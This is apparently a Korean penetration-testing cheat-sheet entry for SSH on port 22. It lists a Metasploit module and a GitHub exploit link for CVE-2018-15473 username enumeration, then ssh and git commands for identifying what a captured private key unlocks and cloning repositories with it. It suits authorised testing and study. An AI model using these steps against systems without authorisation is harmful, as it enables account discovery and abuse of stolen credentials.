22 - ssh
시스템 계정 열거
CVE-2018-15473로 인해 OpenSSH 7.7 미만의 버전에서는 서버에 사전 기반의 시스템 계정 열거 공격이 가능합니다.
# msfconsole 사용
msfconsole
use auxiliary/scanner/ssh/ssh_enumusers
# github 사용
https://github.com/Rhynorater/CVE-2018-15473-Exploit/blob/master/sshUsernameEnumExploit.py정보 수집
ssh 비밀키를 획득했을 때 기본 정보 열거 옵션을 통해 어떤 계정의 키인지 확인할 수 있습니다.
또한 올바른 키를 통해 정확한 서버에 로그인을 시도했을 때와 그 외의 경우, 출력되는 응답 로그를 통해 어떤 서버에 로그인 가능한지 여부를 확인할 수 있습니다.
# 비밀키의 지문(sha256) 확인
ssh-keygen -lf id_rsa
# 개인키로 원격 호스트에 인증만 테스트 (TTY 없이 인증만 시도)
ssh -T -i id_rsa [email protected]
# 서버에 접근하여 어디에 사용되는 SSH 키인지 확인
ssh -T -i id_rsa [email protected]
ssh -T -i id_rsa [email protected]
# github 비밀키를 이용하여 깃클론
GIT_SSH_COMMAND='ssh -i id_rsa -o IdentitiesOnly=yes' git clone [email protected]:/'<repositorie>'Last updated